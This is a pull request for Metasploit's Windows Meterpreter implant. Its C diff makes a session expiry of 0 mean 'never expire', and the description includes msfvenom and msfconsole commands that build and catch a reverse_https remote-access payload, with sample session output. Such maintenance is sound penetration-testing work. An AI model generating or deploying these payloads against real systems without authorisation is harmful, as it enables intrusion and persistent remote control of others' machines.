### PR TITLE
Fix windows meterpreter transport session expiry time, 0 should never…

### DIFF
--- a/c/meterpreter/source/metsrv/server_setup.c
+++ b/c/meterpreter/source/metsrv/server_setup.c
@@ -231,7 +231,14 @@ static void config_create(Remote* remote, LPBYTE uuid, MetsrvConfig** config, LP
 	memcpy(sess->uuid, uuid == NULL ? remote->orig_config->session.uuid : uuid, UUID_SIZE);
 	// session GUID should persist across migration
 	memcpy(sess->session_guid, remote->orig_config->session.session_guid, sizeof(GUID));
-	sess->expiry = remote->sess_expiry_end - current_unix_timestamp();
+	if (remote->sess_expiry_end)
+	{
+		sess->expiry = remote->sess_expiry_end - current_unix_timestamp();
+	}
+	else
+	{
+		sess->expiry = 0;
+	}
 	sess->exit_func = EXITFUNC_THREAD; // migration we default to this.
 
 	Transport* current = remote->transport;
@@ -345,7 +352,14 @@ DWORD server_setup(MetsrvConfig* config)
 
 			remote->sess_expiry_time = config->session.expiry;
 			remote->sess_start_time = current_unix_timestamp();
-			remote->sess_expiry_end = remote->sess_start_time + config->session.expiry;
+			if (remote->sess_expiry_time)
+			{
+				remote->sess_expiry_end = remote->sess_start_time + remote->sess_expiry_time;
+			}
+			else
+			{
+				remote->sess_expiry_end = 0;
+			}
 
 			dprintf("[DISPATCH] Session going for %u seconds from %u to %u", remote->sess_expiry_time, remote->sess_start_time, remote->sess_expiry_end);
 

--- a/c/meterpreter/source/metsrv/server_transport_named_pipe.c
+++ b/c/meterpreter/source/metsrv/server_transport_named_pipe.c
@@ -295,7 +295,7 @@ static DWORD server_dispatch_named_pipe(Remote* remote, THREAD* dispatchThread)
 		{
 			// check if the communication has timed out, or the session has expired, so we should terminate the session
 			int now = current_unix_timestamp();
-			if (now > remote->sess_expiry_end)
+			if (remote->sess_expiry_end && now > remote->sess_expiry_end)
 			{
 				result = ERROR_SUCCESS;
 				dprintf("[NP DISPATCH] session has ended");

--- a/c/meterpreter/source/metsrv/server_transport_tcp.c
+++ b/c/meterpreter/source/metsrv/server_transport_tcp.c
@@ -550,7 +550,7 @@ static DWORD server_dispatch_tcp(Remote* remote, THREAD* dispatchThread)
 		{
 			// check if the communication has timed out, or the session has expired, so we should terminate the session
 			int now = current_unix_timestamp();
-			if (now > remote->sess_expiry_end)
+			if (remote->sess_expiry_end && now > remote->sess_expiry_end)
 			{
 				result = ERROR_SUCCESS;
 				dprintf("[DISPATCH] session has ended");


### PR DESCRIPTION
Quick fix for https://github.com/rapid7/metasploit-framework/issues/15478

This changes the session expiry behaviour so that 0 is interpreted as never expiring.
This behaviour is now the same as on the Android and Python meterpreter.

## Verification
`msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost eth0; set lport 4444; set ExitOnSession false; run -j"`
`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$LHOST LPORT=4444 -f exe -o out.exe`

### Before
```
meterpreter > get_timeouts
Session Expiry  : @ 2021-08-04 22:27:54
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 99999
Session Expiry  : @ 2021-07-30 02:14:51
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 0
Session Expiry  : @ 2021-07-30 02:14:51
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
(session expiry was not updated)
```

### After
```
meterpreter > get_timeouts
Session Expiry  : @ 2021-08-04 22:33:55
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 99999
Session Expiry  : @ 2021-07-30 02:20:49
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 0
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
```
